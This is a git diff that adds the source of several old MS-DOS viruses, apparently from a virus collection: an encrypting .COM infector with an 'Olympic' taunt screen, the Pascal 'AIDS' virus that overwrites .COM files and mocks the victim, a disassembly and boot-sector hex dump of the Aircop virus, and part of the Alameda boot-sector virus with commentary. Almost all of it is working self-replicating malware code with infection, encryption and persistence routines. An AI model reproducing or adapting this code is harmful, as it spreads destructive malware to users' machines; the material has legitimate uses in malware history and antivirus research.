; Restore old stack frame + mov ah,01Ah ; DOS set DTA function + pop dx ; Retrieve old DTA address + int 021h + + pop bp ; Restore BP + ret ; Return to caller +find_files endp + + + ; -- FUCK A FILE ------- + +infect_file proc near + mov ah,02Fh ; DOS get DTA address function + int 021h + mov si,bx ; SI points to the DTA + + mov byte ptr [di + set_carry],0 ; Assume we'll fail + + cmp word ptr [si + 01Ah],(65279 - (finish - start)) + jbe size_ok ; If it's small enough continue + jmp infection_done ; Otherwise exit + +size_ok: mov ax,03D00h ; DOS open file function, r/o + lea dx,[si + 01Eh] ; DX points to file name + int 021h + xchg bx,ax ; BX holds file handle + + mov ah,03Fh ; DOS read from file function + mov cx,3 ; CX holds bytes to read (3) + lea dx,[di + buffer] ; DX points to buffer + int 021h + + mov ax,04202h ; DOS file seek function, EOF + cwd ; Zero DX _ Zero bytes from end + mov cx,dx ; Zero CX / + int 021h + + xchg dx,ax ; Faster than a PUSH AX + mov ah,03Eh ; DOS close file function + int 021h + xchg dx,ax ; Faster than a POP AX + + sub ax,finish - start + 3 ; Adjust AX for a valid jump + cmp word ptr [di + buffer + 1],ax ; Is there a JMP yet? + je infection_done ; If equal then exit + mov byte ptr [di + set_carry],1 ; Success -- the file is OK + add ax,finish - start ; Re-adjust to make the jump + mov word ptr [di + new_jump + 1],ax ; Construct jump + + mov ax,04301h ; DOS set file attrib. function + xor cx,cx ; Clear all attributes + lea dx,[si + 01Eh] ; DX points to victim's name + int 021h + + mov ax,03D02h ; DOS open file function, r/w + int 021h + xchg bx,ax ; BX holds file handle + + mov ah,040h ; DOS write to file function + mov cx,3 ; CX holds bytes to write (3) + lea dx,[di + new_jump] ; DX points to the jump we made + int 021h + + mov ax,04202h ; DOS file seek function, EOF + cwd ; Zero DX _ Zero bytes from end + mov cx,dx ; Zero CX / + int 021h + + push si ; Save SI through call + call encrypt_code ; Write an encrypted copy + pop si ; Restore SI + + mov ax,05701h ; DOS set file time function + mov cx,[si + 016h] ; CX holds old file time + mov dx,[si + 018h] ; DX holds old file date + int 021h + + mov ah,03Eh ; DOS close file function + int 021h + + mov ax,04301h ; DOS set file attrib. function + xor ch,ch ; Clear CH for file attribute + mov cl,[si + 015h] ; CX holds file's old attributes + lea dx,[si + 01Eh] ; DX points to victim's name + int 021h + +infection_done: cmp byte ptr [di + set_carry],1 ; Set carry flag if failed + ret ; Return to caller + +set_carry db ? ; Set-carry-on-exit flag +buffer db 090h,0CDh,020h ; Buffer to hold old three bytes +new_jump db 0E9h,?,? ; New jump to virus +infect_file endp + + + ; -- CRUNCHED OLYMPIC RINGS ------ + +AnsiData: DB 15,16,24,24,24,1,26,17,' ',15,'L i l l e h a' + DB ' m m e r ',39,' 9 4 ',1,26,17,'',24,24,25,20 + DB 'Haakon And Kristin Blew It Up Again...',24,25,19,26,5 + DB '',25,10,8,26,5,'',25,10,4,26,5,'',24,25,16,1,'' + DB '',25,3,'',25,4,8,'',25,3,'',25,4,4,'' + DB '',25,3,'',24,25,15,1,'',25,8,14,'',17,'',1 + DB 16,'',14,'',8,'',25,8,2,'',8,18,'',16,'',2,'' + DB '',4,'',25,9,'',24,25,14,1,'',25,6,14,' ' + DB 1,' ',8,'',14,'',25,4,2,' ',8,' ',20,' ',0 + DB '',2,16,'',25,9,4,'',24,25,14,1,'',25,5,14,'' + DB '',25,3,1,' ',8,' ',14,'',25,2,2,'',25,3,8,'' + DB ' ',4,' ',2,'',25,8,4,'',24,25,15,1,'',25,3,14 + DB '',25,3,1,'',25,2,8,' ',14,' ',2,'',25,3,8,'' + DB '',25,2,4,' ',2,'',25,6,4,'',24,25,16,1,'' + DB ' ',14,' ',1,'',25,4,8,'',14,' ',2,' ',8,'' + DB '',25,4,4,'',2,'',25,3,4,'',24,25,19,1,'' + DB '',14,17,'',1,16,'',25,8,14,'',8,'',2,'',8 + DB 18,'',16,'',25,8,2,'',4,26,5,'',24,25,23,14,'' + DB '',25,3,'',25,4,2,'',25,3,'',0,18,'',24 + DB 16,25,26,14,26,5,'',25,10,2,26,5,'',25,12,0,'1',24,1 + DB 'This Time They Have Been Fucking Around With The Ol' + DB 'ympic Computers, And Managed',24,25,2,'To Infect A ' + DB 'Lot Of Your Computers With A Little Tiny Destructiv' + DB 'e Virus...',24,24,'Now, Antonio, You Can',39,'t Let' + DB ' Them Runaway With This, Punish The Little Bastards' + DB '!',24,24,26,'O',24,24,24,24 +AnsiEnd: DB 0 + + + ; -- WRITE ENCRYPTED COPY ------- + +encrypt_code proc near + push bp ; Save BP + mov bp,di ; Use BP as pointer to code + lea si,[bp + encrypt_decrypt]; SI points to cipher routine + + xor ah,ah ; BIOS get time function + int 01Ah + mov word ptr [si + 9],dx ; Low word of timer is new key + + xor byte ptr [si + 1],8 ; + xor byte ptr [si + 8],1 ; Change all SIs to DIs + xor word ptr [si + 11],0101h; (and vice-versa) + + lea di,[bp + finish] ; Copy routine into heap + mov cx,finish - encrypt_decrypt - 1 ; All but final RET + push si ; Save SI for later + push cx ; Save CX for later + rep movsb ; Copy the bytes + + lea si,[bp + write_stuff] ; SI points to write stuff + mov cx,5 ; CX holds length of write + rep movsb ; Copy the bytes + + pop cx ; Restore CX + pop si ; Restore SI + inc cx ; Copy the RET also this time + rep movsb ; Copy the routine again + + mov ah,040h ; DOS write to file function + lea dx,[bp + start] ; DX points to virus + + lea si,[bp + finish] ; SI points to routine + call si ; Encrypt/write/decrypt + + mov di,bp ; DI points to virus again + pop bp ; Restore BP + ret ; Return to caller + +write_stuff: mov cx,finish - start ; Length of code + int 021h +encrypt_code endp + +end_of_code label near + + ; ----------- + + Note db " Olympic Aid(s) '94 " + db " (c) The Penetrator " + + ; -- ENCRYPT/DECRYPT ------- + +encrypt_decrypt proc near + lea si,[bp + start_of_code] ; SI points to code to decrypt + mov cx,(end_of_code - start_of_code) / 2 ; CX holds length +xor_loop: db 081h,034h,00h,00h ; XOR a word by the key + inc si ; Do the next word + inc si ; + loop xor_loop ; Loop until we're through + ret ; Return to caller +encrypt_decrypt endp +finish label near + +code ends + end main + + + ; -- END OF STORY ------- \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.aids.pas b/MSDOS/Virus.MSDOS.Unknown.aids.pas new file mode 100644 index 00000000..075b8695 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.aids.pas @@ -0,0 +1,302 @@ +{AIDS + +Although this is a primitive virus its effective. +In this virus only the .COM +files are infected. Its about 13K and it will +change the date entry.} + +{C-} +{U-} +{I-} { Wont allow a user break, enable IO check } +{ -- Constants --------------------------------------- } +Const + VirusSize = 13847; { AIDS's code size } + Warning :String[42] { Warning message } + = 'This File Has Been Infected By AIDS! HaHa!'; +{ -- Type declarations------------------------------------- } +Type + DTARec =Record { Data area for file search } + DOSnext :Array[1..21] of Byte; + Attr : Byte; + Ftime, + FDate, + FLsize, + FHsize : Integer; + FullName: Array[1..13] of Char; + End; +Registers = Record {Register set used for file search } + Case Byte of + 1 : (AX,BX,CX,DX,BP,SI,DI,DS,ES,Flags : Integer); + 2 : (AL,AH,BL,BH,CL,CH,DL,DH : Byte); + End; +{ -- Variables--------------------------------------------- } +Var + { Memory offset program code } + ProgramStart : Byte absolute Cseg:$100; + { Infected marker } + MarkInfected : String[42] absolute Cseg:$180; + Reg : Registers; { Register set } + DTA : DTARec; { Data area } + Buffer : Array[Byte] of Byte; { Data buffer } + TestID : String[42]; { To recognize infected files } + UsePath : String[66]; { Path to search files } + { Lenght of search path } + UsePathLenght: Byte absolute UsePath; + Go : File; { File to infect } + B : Byte; { Used } + LoopVar : Integer; {Will loop forever} +{ -- Program code------------------------------------------ } +Begin + GetDir(0, UsePath); { get current directory } + if Pos('\', UsePath) < UsePathLenght then + UsePath := UsePath + '\'; + UsePath := UsePath + '*.COM'; { Define search mask } + Reg.AH := $1A; { Set data area } + Reg.DS := Seg(DTA); + Reg.DX := Ofs(DTA); + MsDos(Reg); + UsePath[Succ(UsePathLenght)]:=#0; { Path must end with #0 } + Reg.AH := $4E; + Reg.DS := Seg(UsePath); + Reg.DX := Ofs(UsePath[1]); + Reg.CX := $ff; { Set attribute to find ALL files } + MsDos(Reg); { Find first matching entry } + IF not Odd(Reg.Flags) Then { If a file found then } + Repeat + UsePath := DTA.FullName; + B := Pos(#0, UsePath); + If B 0 then + Delete(UsePath, B, 255); { Remove garbage } + Assign(Go, UsePath); + Reset(Go); + If IOresult = 0 Then { If not IO error then } + Begin + BlockRead(Go, Buffer, 2); + Move(Buffer[$80], TestID, 43); + { Test if file already ill(Infected) } + If TestID < Warning Then { If not then ... } + Begin + Seek (Go, 0); + { Mark file as infected and .. } + MarkInfected := Warning; + { Infect it } + BlockWrite(Go,ProgramStart,Succ(VirusSize shr 7)); + Close(Go); + Halt; {.. and halt the program } + End; + Close(Go); + End; + { The file has already been infected, search next. } + Reg.AH := $4F; + Reg.DS := Seg(DTA); + Reg.DX := Ofs(DTA); + MsDos(Reg); + { ......................Until no more files are found } + Until Odd(Reg.Flags); +Loopvar:=Random(10); +If Loopvar=7 then +begin + Writeln('_'); {Give a lot of smiles} +Writeln('__'); +Writeln(' + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +'); +Writeln(' + ATTENTION: +'); +Writeln(' + I have been elected to inform you that throughout your process of +'); +Writeln(' + collecting and executing files, you have accidentally _HK_ +'); +Writeln(' + yourself over; again, that''s PHUCKED yourself over. No, it cannot +'); +Writeln(' + be; YES, it CAN be, a -s has infected your system. Now what do +'); +Writeln(' + you have to say about that? HAHAHAHA. Have _H¥ with this one and +'); +Writeln(' + remember, there is NO cure for +'); +Writeln(' + +'); +Writeln(' + +'); +Writeln(' + ±±±±±± ±±±±±±±±±± ±±±±±±± ±±±±±±± +'); +Writeln(' + ±± ± ± ± ± ±± ±± +'); +Writeln(' + ± ± ± ± ± ± +'); +Writeln(' + ± ± ± ± +'); +Writeln(' + ±±±±±±±±± ± ± ± ±±±±±±±±±± +'); +Writeln(' + ± ± ± ± ± ± +'); +Writeln(' + ± ± ± ± ± ± +'); +Writeln(' + ± ± ±± ±± +'); +Writeln(' + ±± ±± ±±±±±±±±±±±± ±±±±±±±±±±± ±±±±±±±±±± +'); +Writeln(' + +'); +Writeln(' + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +'); +REPEAT +LOOPVAR:=0; +UNTIL LOOPVAR=1; +end; +End. + +This page hosted by Get your own Free Homepage diff --git a/MSDOS/Virus.MSDOS.Unknown.aircop.asm b/MSDOS/Virus.MSDOS.Unknown.aircop.asm new file mode 100644 index 00000000..d33a47a0 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.aircop.asm @@ -0,0 +1,467 @@ +͸ + Aircop Virus (c)RABiD Source Code + Ripped by : The Head Hunter [FS] + + Seem's this baby only work on Bare 360k Drive + System. Neat Anywayz. And it's Undetectable! + + +; + MOV AX, CS + MOV DS, AX + MOV SP, 03b6h + MOV AH, 00h + MOV AL, 03h + INT 10h ;Set video mode + MOV DX, 052bh + MOV AH, 09h + INT 21h ;"AIRCOP Test Version" + MOV DX, 03c3h + MOV AH, 09h + INT 21h ;" + + MOV DX, 04e5h + MOV AH, 09h + INT 21h ;"Aircop Virus$Cannot" + MOV DX, 0464h + MOV AH, 09h + INT 21h ;"" into your 360K di" + MOV DX, 0480h + MOV AH, 09h + INT 21h ;"Put a 360K (Blank F" + MOV AX, 0040h + MOV ES, AX + + PUSH WORD PTR ES:[Data5] + + POP WORD PTR ES:[Data6] + MOV AX, CS + MOV ES, AX + MOV AH, 08h + INT 21h ;Get char w/o echo + MOV CX, 0003h + PUSH CX + MOV AX, 0201h + MOV BX, 05d0h + MOV CX, 0001h + MOV DX, 0000h + INT 13h ;Read disk sectors + POP CX + JNB Jmp0 + LOOP Data7 + MOV DX, 04f2h + MOV AH, 09h + INT 21h ;"Cannot read boot re" + MOV AX, 4cffh + INT 21h ;Exit + + XOR WORD PTR CS:[BP+Data17], 7420h + PUSH CX + MOV AX, 0301h + MOV BX, 05d0h + MOV CX, 2709h + MOV DX, 0100h + INT 13h ;Write disk sectors + POP CX + JNB Jmp4 + LOOP Data18 + MOV DX, 050eh + MOV AH, 09h + INT 21h ;"Cannot write boot r" + MOV AX, 4cffh + INT 21h ;Exit + + MOV CX, 0003h + PUSH CX + MOV AX, 0301h + MOV BX, 07d0h + MOV CX, 0001h + MOV DX, 0000h + INT 13h ;Write disk sectors + POP CX + JNB Jmp5 + LOOP Data20 + MOV DX, 057ch + MOV AH, 09h + INT 21h ;"Cannot write virus " + MOV AX, 4cffh + INT 21h ;Exit + + MOV DX, 04e5h + MOV AH, 09h + INT 21h ;"Aircop Virus$Cannot" + MOV DX, 059eh + MOV AH, 09h + INT 21h ;" was installed into" + MOV AX, 4c00h + INT 21h ;Exit + db 'STACK STACK STAC' + db 'K STACK STACK ' + db 'STACK STACK STAC' + db 'K STACK STACK ' + db 'STACK STACK STAC' + db 'K STACK STACK ' + db 'STACK STACK ' + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [DI], CL + + OR AL, BYTE PTR [BX+DI+Data11] + JZ Jmp1 + OUTSB + JZ Jmp2 + OUTSW + OUTSB + CMP AH, BYTE PTR [BX+SI] + PUSH SP + PUSH BYTE PTR [BX+DI+Data12], 7620h + db 'irus sample uses onl' + db 'y in research teams.' + db 0d,0a + db ' Please do' + db ' not use in joking o' + db 'r setting tra' + + XOR WORD PTR CS:[BX+SI], 6e69h + + XOR WORD PTR CS:[BP+SI+Data13], 2073h + OUTSW + OUTSB + AND BYTE PTR [BP+DI+Data14], DH + INSW + db 'eone.' + db 0d,0a,0d,0a + db 'Warning! This file i' + + XOR WORD PTR CS:[BX+Data15], 2e65h + db 'nstalls "$" into you' + + db 'r 360K disk!' + db 0d,0a,0d,0a,07 + db '$Put a 360K (Blank F' + + db 'ormatted) disk into ' + db 'drive A:' + db 0d,0a + db 'Strike any key to in' + db 'stall, or CTRL-BREAK' + db ' to quit.' + db 0d,0a + db '$Aircop Virus$Cannot' + + + db ' read boot record.' + db 0d,0a,07 + db '$Cannot write boot r' + + db 'ecord.' + db 0d,0a,07 + db '$AIRCOP Test Version' + + db ': Property of The RA' + db 'BID Nat'nl Developme' + db 'nt Corp. '91' + db 0d,0a,20,24,0d,0a,0d,0a,0d,0a + + db 'Cannot write virus b' + db 'oot record' + db 0d,0a,07 + db '$ was installed into' + + db ' this 360K disk. BE ' + db 'CAREFUL!' + db 0d,0a,24,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 + db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 + db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 + db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 + db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 + db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 + db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 + db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 + db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 + db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 + db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 + db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 + db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 + db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 + db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 + db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 + db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 + db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 + db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 + db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 + db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 + db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 + db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 + db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 + db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 + db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,eb,34,90,49,42 + db 'M 3.3' + db 00,02,02,01,00,02,70,00,d0,02,fd,02,00,09,00,02,00,00,00,00 + db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,12,00,00,00 + db 00,01,00,fa,33,c0,8e,d8,8e,d0,bb,00,7c,8b,e3,1e,53,ff,0e,13 + db 04,cd,12,b1,06,d3,e0,8e,c0,87,06,4e,00,a3,ab,7d,b8,28,01,87 + db 06,4c,00,a3,a9,7d,8c,c0,87,06,66,00,a3,af,7d,b8,bb,00,87,06 + db 64,00,a3,ad,7d,33,ff,8b,f3,b9,00,01,fc,f3,a5,fb,06,b8,85,00 + db 50,cb,53,32,d2,e8,70,00,5b,1e,07,b4,02,b6,01,e8,8a,00,72,10 + db 0e,1f,be,0b,00,bf,0b,7c,b9,2b,00,fc,f3,a6,74,07,5b,58,0e,b8 + db af,00,50,cb,0e,1f,be,db,01,e8,23,00,32,e4,cd,16,33,c0,cd,13 + db 0e,07,bb,0d,02,b9,06,00,33,d2,b8,01,02,cd,13,72,df,b9,f0,0f + db 8e,d9,2e,ff,2e,ad,01,bb,07,00,fc,ac,0a,c0,74,44,79,05,34,d7 + db 80,cb,88,3c,20,76,07,b9,01,00,b4,09,cd,10,b4,0e,cd,10,eb,df + db bb,00,02,b9,02,00,8a,e1,e8,17,00,b9,09,27,26,80,37,fd,74,03 + db b9,0f,4f,eb,13,90,b4,02,bb,00,02,b9,01,00,b6,00,b0,01,9c,2e + db ff,1e,a9,01,c3,50,53,51,52,06,1e,56,57,9c,0e,1f,80,fa,01,77 + db 54,25,00,fe,74,4f,86,c5,d0,e0,02,c6,b4,09,f6,e4,03,c1,2c,06 + db 3d,06,00,77,3c,0e,07,e8,c0,ff,72,30,bf,43,00,be,50,02,b9,0e + db 00,fd,f3,a6,74,27,2b,f1,2b,f9,b1,33,f3,a4,e8,8b,ff,51,53,e8 + db a0,ff,b4,03,33,db,e8,9e,ff,5b,59,72,07,b6,01,b4,03,e8,98,ff + db 33,c0,e8,95,ff,b4,04,cd,1a,80,fe,09,75,06,be,b1,01,e8,3f,ff + db 9d,5f,5e,1f,07 + db 'ZY[X.' + db ff,2e,a9,01,59,ec,02,c6,f2,e6,00,f0,da,dd,20,83,bf,be,a4,f7 + db be,a4,f7,96,be,a5,b4,b8,a7,da,dd,00 + db 'IO SYSMSDOS S' + db 59,53,0d,0a + db 'Non-system disk or d' + db 'isk error' + db 0d,0a,00,00,55,aa + + + + + + diff --git a/MSDOS/Virus.MSDOS.Unknown.alameda.asm b/MSDOS/Virus.MSDOS.Unknown.alameda.asm new file mode 100644 index 00000000..287ade7e --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.alameda.asm @@ -0,0 +1,381 @@ +;-----------------------------------------------------------------------; +; This virus is of the "FLOPPY ONLY" variety. ; +; It replicates to the boot sector of a floppy disk and when it gains control +; it will move itself to upper memory. It redirects the keyboard ; +; interrupt (INT 09H) to look for ALT-CTRL-DEL sequences at which time ; +; it will attempt to infect any floppy it finds in drive A:. ; +; It keeps the real boot sector at track 39, sector 8, head 0 ; +; It does not map this sector bad in the fat (unlike the Pakistani Brain) +; and should that area be used by a file, the virus ; +; will die. It also contains no anti detection mechanisms as does the ; +; BRAIN virus. It apparently uses head 0, sector 8 and not head 1 ; +; sector 9 because this is common to all floppy formats both single ; +; sided and double sided. It does not contain any malevolent TROJAN ; +; HORSE code. It does appear to contain a count of how many times it ; +; has infected other diskettes although this is harmless and the count ; +; is never accessed. ; +; ; +; Things to note about this virus: ; +; It can not only live through an ALT-CTRL-DEL reboot command, but this ; +; is its primary (only for that matter) means of reproduction to other ; +; floppy diskettes. The only way to remove it from an infected system ; +; is to turn the machine off and reboot an uninfected copy of DOS. ; +; It is even resident when no floppy is booted but BASIC is loaded ; +; instead. Then when ALT-CTRL-DEL is pressed from inside of BASIC, ; +; it activates and infectes the floppy from which the user is ; +; attempting to boot. ; +; ; +; Also note that because of the POP CS command to pass control to ; +; its self in upper memory, this virus does not to work on 80286 ; +; machines (because this is not a valid 80286 instruction). ; +; ; +; The Norton Utilities can be used to identify infected diskettes by ; +; looking at the boot sector and the DOS SYS utility can be used to ; +; remove it (unlike the Pakistani Brain). ; +;-----------------------------------------------------------------------; + ; + ORG 7C00H ; + ; +TOS LABEL WORD ;TOP OF STACK +;-----------------------------------------------------------------------; +; 1. Find top of memory and copy ourself up there. (keeping same offset); +; 2. Save a copy of the first 32 interrupt vectors to top of memory too ; +; 3. Redirect int 9 (keyboard) to ourself in top of memory ; +; 4. Jump to ourself at top of memory ; +; 5. Load and execute REAL boot sector from track 40, head 0, sector 8 ; +;-----------------------------------------------------------------------; +BEGIN: CLI ;INITIALIZE STACK + XOR AX,AX ; + MOV SS,AX ; + MOV SP,offset TOS ; + STI ; + ; + MOV BX,0040H ;ES = TOP OF MEMORY - (7C00H+512) + MOV DS,BX ; + MOV AX,[0013H] ; + MUL BX ; + SUB AX,07E0H ; (7C00H+512)/16 + MOV ES,AX ; + ; + PUSH CS ;DS = CS + POP DS ; + ; + CMP DI,3456H ;IF THE VIRUS IS REBOOTING... + JNE B_10 ; + DEC Word Ptr [COUNTER_1] ;...LOW&HI:COUNTER_1-- + ; +B_10: MOV SI,SP ;SP=7C00 ;COPY SELF TO TOP OF MEMORY + MOV DI,SI ; + MOV CX,512 ; + CLD ; + REP MOVSB ; + ; + MOV SI,CX ;CX=0 ;SAVE FIRST 32 INT VETOR ADDRESSES TO + MOV DI,offset BEGIN - 128 ; 128 BYTES BELOW OUR HI CODE + MOV CX,128 ; + REP MOVSB ; + ; + CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD) + ; + PUSH ES ;ES=HI ; JUMP TO OUR HI CODE WITH + NOP + ; + PUSH DS ;DS=0 ; ES = DS + POP ES ; + ; + MOV BX,SP ; SP=7C00 ;LOAD REAL BOOT SECTOR TO 0000:7C00 + MOV DX,CX ;CX=0 ;DRIVE A: HEAD 0 + MOV CX,2708H ; TRACK 40, SECTOR 8 + MOV AX,0201H ; READ SECTOR + INT 13H ; (common to 8/9 sect. 1/2 sided!) + JB $ ; HANG IF ERROR + ; + JMP JMP_BOOT ;JMP 0000:7C00 + ; +;-----------------------------------------------------------------------; +; SAVE THEN REDIRECT INT 9 VECTOR ; +; ; +; ON ENTRY: DS = 0 ; +; ES = WHERE TO SAVE OLD_09 & (HI) ; +; WHERE NEW_09 IS (HI) ; +;-----------------------------------------------------------------------; +PUT_NEW_09: ; + DEC Word Ptr [0413H] ;TOP OF MEMORY (0040:0013) -= 1024 + ; + MOV SI,9*4 ;COPY INT 9 VECTOR TO + MOV DI,offset OLD_09 ; OLD_09 (IN OUR HI CODE!) + MOV CX,0004 ; + ; + CLI ; + REP MOVSB ; + MOV Word Ptr [9*4],offset NEW_09 + MOV [(9*4)+2],ES ; + STI ; + ; + RET ; + ; +;-----------------------------------------------------------------------; +; RESET KEYBOARD, TO ACKNOWLEDGE LAST CHAR ; +;-----------------------------------------------------------------------; +ACK_KEYBD: ; + IN AL,61H ;RESET KEYBOARD THEN CONTINUE + MOV AH,AL ; + OR AL,80H ; + OUT 61H,AL ; + XCHG AL,AH ; + OUT 61H,AL ; + JMP RBOOT ; + ; +;-----------------------------------------------------------------------; +; DATA AREA WHICH IS NOT USED IN THIS VERSION ; +; REASON UNKNOWN ; +;-----------------------------------------------------------------------; +TABLE DB 27H,0,1,2 ;FORMAT INFORMATION FOR TRACK 39 + DB 27H,0,2,2 ; (CURRENTLY NOT USED) + DB 27H,0,3,2 ; + DB 27H,0,4,2 ; + 